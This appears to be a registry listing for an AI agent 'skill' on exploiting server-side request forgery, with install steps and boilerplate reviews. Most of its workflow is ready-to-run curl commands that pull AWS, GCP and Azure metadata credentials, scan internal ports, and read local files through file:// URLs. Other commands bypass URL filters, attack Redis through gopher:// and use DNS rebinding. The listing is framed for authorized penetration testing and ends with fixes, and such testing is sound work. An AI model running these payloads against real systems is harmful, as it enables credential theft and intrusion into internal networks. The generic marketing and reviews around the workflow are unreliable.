exploiting-server-side-request-forgery▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Identifying and exploiting SSRF vulnerabilities to access internal services, cloud metadata, and restricted network resources during authorized penetration tests.
| name | exploiting-server-side-request-forgery |
| description | Identifying and exploiting SSRF vulnerabilities to access internal services, cloud metadata, and restricted network resources during authorized penetration tests. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | - penetration-testing - ssrf - owasp - cloud-security - web-security - burpsuite |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
Exploiting Server-Side Request Forgery
When to Use
- During authorized penetration tests when the application fetches URLs provided by users (webhooks, URL previews, file imports)
- When testing cloud-hosted applications for access to instance metadata services
- For assessing PDF generators, screenshot services, or any feature that renders external content
- When evaluating microservice architectures for internal service access via SSRF
- During security assessments of APIs that accept URL parameters for data fetching
Prerequisites
- Authorization: Written penetration testing agreement including SSRF testing scope
- Burp Suite Professional: With Collaborator for out-of-band detection
- interactsh: Open-source OOB interaction server (
go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest) - SSRFmap: Automated SSRF exploitation framework (
git clone https://github.com/swisskyrepo/SSRFmap.git) - curl: For manual SSRF payload testing
- Knowledge of target infrastructure: Cloud provider (AWS, GCP, Azure), internal IP ranges
Workflow
Step 1: Identify SSRF-Prone Functionality
Map all application features that make server-side HTTP requests.
# Common SSRF-prone features:
# - URL preview/unfurling (Slack-like link previews)
# - Webhook configuration endpoints
# - File import from URL (import CSV from URL)
# - PDF/screenshot generation from URL
# - Image/avatar fetching from URL
# - RSS/feed aggregation
# - OAuth callback URLs
# - API proxy/gateway features
# Test a URL parameter with Burp Collaborator
# Replace URL values with Collaborator payload
curl -s -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"url":"http://abc123.burpcollaborator.net/ssrf-test"}' \
"https://target.example.com/api/fetch-url"
curl -s -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"webhook_url":"http://abc123.oast.fun/webhook"}' \
"https://target.example.com/api/webhooks"
# Test URL in various parameter names
for param in url uri link href src dest redirect callback webhook \
image_url avatar_url feed_url import_url proxy_url; do
echo "Testing param: $param"
curl -s -o /dev/null -w "%{http_code}" \
"https://target.example.com/api/fetch?${param}=http://abc123.oast.fun/${param}"
done
Step 2: Access Cloud Instance Metadata
Test SSRF payloads targeting cloud provider metadata services.
# AWS EC2 Metadata (IMDSv1)
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/latest/meta-data/"}' \
"https://target.example.com/api/fetch-url"
# AWS - Get IAM role credentials
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/"}' \
"https://target.example.com/api/fetch-url"
# GCP Metadata
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://metadata.google.internal/computeMetadata/v1/"}' \
"https://target.example.com/api/fetch-url"
# Azure Metadata
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/metadata/instance?api-version=2021-02-01"}' \
"https://target.example.com/api/fetch-url"
# DigitalOcean Metadata
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/metadata/v1/"}' \
"https://target.example.com/api/fetch-url"
Step 3: Scan Internal Network via SSRF
Use the SSRF vulnerability to discover internal services and ports.
# Internal network scanning - common private ranges
for ip in 127.0.0.1 10.0.0.1 172.16.0.1 192.168.1.1; do
for port in 22 80 443 3000 3306 5432 6379 8080 8443 9200 27017; do
echo -n "$ip:$port -> "
response=$(curl -s --max-time 3 -X POST \
-H "Content-Type: application/json" \
-d "{\"url\":\"http://$ip:$port/\"}" \
"https://target.example.com/api/fetch-url")
echo "$response" | head -c 100
echo
done
done
# Kubernetes internal services
for svc in kubernetes.default.svc \
kubernetes-dashboard.kubernetes-dashboard.svc \
kube-dns.kube-system.svc; do
curl -s --max-time 3 -X POST \
-H "Content-Type: application/json" \
-d "{\"url\":\"http://$svc/\"}" \
"https://target.example.com/api/fetch-url"
done
# Access internal admin panels
for path in /admin /console /actuator/env /server-status /_cat/indices; do
curl -s -X POST \
-H "Content-Type: application/json" \
-d "{\"url\":\"http://127.0.0.1:8080$path\"}" \
"https://target.example.com/api/fetch-url"
done
Step 4: Bypass SSRF Filters and Allowlists
When basic payloads are blocked, use bypass techniques.
# IP address encoding bypasses for 127.0.0.1
PAYLOADS=(
"http://127.0.0.1/"
"http://0177.0.0.1/" # Octal
"http://0x7f.0.0.1/" # Hex
"http://2130706433/" # Decimal
"http://127.1/" # Short form
"http://0/" # Zero
"http://[::1]/" # IPv6 loopback
"http://0.0.0.0/" # All interfaces
"http://localtest.me/" # DNS resolves to 127.0.0.1
"http://spoofed.burpcollaborator.net/" # DNS rebinding
"http://127.0.0.1.nip.io/" # Wildcard DNS
)
for payload in "${PAYLOADS[@]}"; do
echo -n "$payload -> "
curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
-X POST -H "Content-Type: application/json" \
-d "{\"url\":\"$payload\"}" \
"https://target.example.com/api/fetch-url"
echo
done
# URL parsing bypass
# Embed credentials: http://[email protected]/
# Fragment: http://evil.com#expected.com
# URL encoding: http://127.0.0.%31/
# Redirect chain: http://attacker.com/redirect?url=http://127.0.0.1
# Protocol bypass
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"file:///etc/passwd"}' \
"https://target.example.com/api/fetch-url"
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"gopher://127.0.0.1:6379/_SET%20ssrf%20test"}' \
"https://target.example.com/api/fetch-url"
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"dict://127.0.0.1:6379/info"}' \
"https://target.example.com/api/fetch-url"
Step 5: Exploit SSRF for Impact Escalation
Chain SSRF with internal services for maximum impact.
# Access Redis via gopher protocol
# Craft gopher payload to set a webshell via Redis
# gopher://127.0.0.1:6379/_CONFIG SET dir /var/www/html
# This is for authorized testing only
# Access Elasticsearch
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://127.0.0.1:9200/_cat/indices?v"}' \
"https://target.example.com/api/fetch-url"
# Read data from Elasticsearch
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://127.0.0.1:9200/users/_search?size=10"}' \
"https://target.example.com/api/fetch-url"
# Access internal Jenkins
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://127.0.0.1:8080/script"}' \
"https://target.example.com/api/fetch-url"
# AWS: Retrieve temporary credentials from IAM role
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role-name"}' \
"https://target.example.com/api/fetch-url"
# Returns: AccessKeyId, SecretAccessKey, Token
Step 6: Test Blind SSRF and DNS Rebinding
For cases where the response is not returned to the attacker.
# Blind SSRF detection using time-based analysis
# Compare response times for accessible vs inaccessible ports
time curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://127.0.0.1:22/"}' \
"https://target.example.com/api/fetch-url"
time curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://127.0.0.1:12345/"}' \
"https://target.example.com/api/fetch-url"
# DNS rebinding attack
# 1. Set up a DNS server that alternates between:
# - First query: returns attacker IP (passes allowlist)
# - Second query: returns 127.0.0.1 (targets internal service)
# 2. Use a rebinding service like rbndr.us
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"url":"http://7f000001.c0a80001.rbndr.us/"}' \
"https://target.example.com/api/fetch-url"
# rbndr.us alternates DNS responses between the two encoded IPs
Key Concepts
| Concept | Description |
|---|---|
| SSRF | Server-Side Request Forgery - making the server send requests to unintended destinations |
| Blind SSRF | SSRF where the response is not returned to the attacker, requiring OOB detection |
| Cloud Metadata | Instance metadata services (169.254.169.254) exposing credentials and configuration |
| Gopher Protocol | Protocol allowing raw TCP data transmission, enabling attacks on internal services |
| DNS Rebinding | DNS attack that switches IP resolution to bypass SSRF hostname allowlists |
| TOCTOU | Time-of-check to time-of-use race condition in URL validation |
| IMDSv2 | AWS metadata service v2 requiring session tokens, mitigating basic SSRF |
| Open Redirect Chain | Using an open redirect to bypass URL allowlists in SSRF filters |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Suite Professional | Request modification and Collaborator for blind SSRF detection |
| SSRFmap | Automated SSRF exploitation framework with protocol support |
| interactsh | Out-of-band interaction detection for blind SSRF |
| Gopherus | Generates gopher payloads for exploiting internal services |
| rbndr.us | DNS rebinding service for SSRF filter bypass |
| singularity | DNS rebinding attack framework for automated exploitation |
Common Scenarios
Scenario 1: Webhook URL SSRF to AWS Credentials
A webhook configuration endpoint allows specifying a callback URL. Pointing it to http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns temporary AWS IAM credentials that can be used to access S3 buckets and other AWS services.
Scenario 2: PDF Generator SSRF
A feature that generates PDFs from URLs makes server-side requests. Providing http://127.0.0.1:8080/admin as the URL generates a PDF containing the internal admin panel content.
Scenario 3: Image URL SSRF with Protocol Bypass
An avatar URL field is filtered for HTTP/HTTPS but accepts file:// protocol. Using file:///etc/passwd as the avatar URL causes the server to read local files and include content in the response.
Scenario 4: Blind SSRF to Internal Redis
A URL fetch feature does not return response content but confirms success/failure. Using gopher protocol payloads, an attacker writes data to an internal Redis instance, achieving remote code execution.
Output Format
## SSRF Vulnerability Finding
**Vulnerability**: Server-Side Request Forgery (Full SSRF)
**Severity**: Critical (CVSS 9.1)
**Location**: POST /api/webhooks - `callback_url` parameter
**OWASP Category**: A10:2021 - Server-Side Request Forgery
### Reproduction Steps
1. Send POST /api/webhooks with callback_url set to http://169.254.169.254/latest/meta-data/
2. Server makes request to AWS metadata endpoint
3. Response contains AWS instance metadata including IAM role name
4. Follow up with IAM credentials endpoint to retrieve temporary access keys
### Confirmed Access
| Target | Protocol | Response |
|--------|----------|----------|
| 169.254.169.254 (AWS metadata) | HTTP | IAM credentials retrieved |
| 127.0.0.1:6379 (Redis) | Gopher | Commands executed |
| 127.0.0.1:9200 (Elasticsearch) | HTTP | Index listing retrieved |
| 10.0.0.5:8080 (Internal API) | HTTP | Admin panel accessible |
### Impact
- AWS IAM temporary credentials exfiltrated (S3 read/write access)
- Internal Redis server accessible (potential RCE)
- Internal Elasticsearch data exposed (user records)
- Full internal network scanning capability
### Recommendation
1. Implement strict URL allowlisting (only allow known trusted domains)
2. Block requests to private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16)
3. Upgrade to AWS IMDSv2 (requires session token header)
4. Disable unused URL protocols (gopher, file, dict, ftp)
5. Use a dedicated outbound proxy for server-side requests with DNS resolution controls
How to use exploiting-server-side-request-forgery on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add exploiting-server-side-request-forgery
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches exploiting-server-side-request-forgery from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate exploiting-server-side-request-forgery. Access the skill through slash commands (e.g., /exploiting-server-side-request-forgery) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.8★★★★★51 reviews- ★★★★★Hana Thomas· Dec 12, 2024
Useful defaults in exploiting-server-side-request-forgery — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Omar Chen· Dec 12, 2024
I recommend exploiting-server-side-request-forgery for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Valentina Taylor· Dec 8, 2024
Solid pick for teams standardizing on skills: exploiting-server-side-request-forgery is focused, and the summary matches what you get after install.
- ★★★★★Soo Abebe· Dec 8, 2024
We added exploiting-server-side-request-forgery from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
- ★★★★★Sophia Gupta· Dec 8, 2024
exploiting-server-side-request-forgery reduced setup friction for our internal harness; good balance of opinion and flexibility.
- ★★★★★Sofia Choi· Nov 27, 2024
I recommend exploiting-server-side-request-forgery for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Diya Johnson· Nov 27, 2024
exploiting-server-side-request-forgery fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
- ★★★★★Sofia Park· Nov 27, 2024
Registry listing for exploiting-server-side-request-forgery matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Yash Thakker· Nov 19, 2024
Useful defaults in exploiting-server-side-request-forgery — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Soo Okafor· Nov 3, 2024
Solid pick for teams standardizing on skills: exploiting-server-side-request-forgery is focused, and the summary matches what you get after install.
showing 1-10 of 51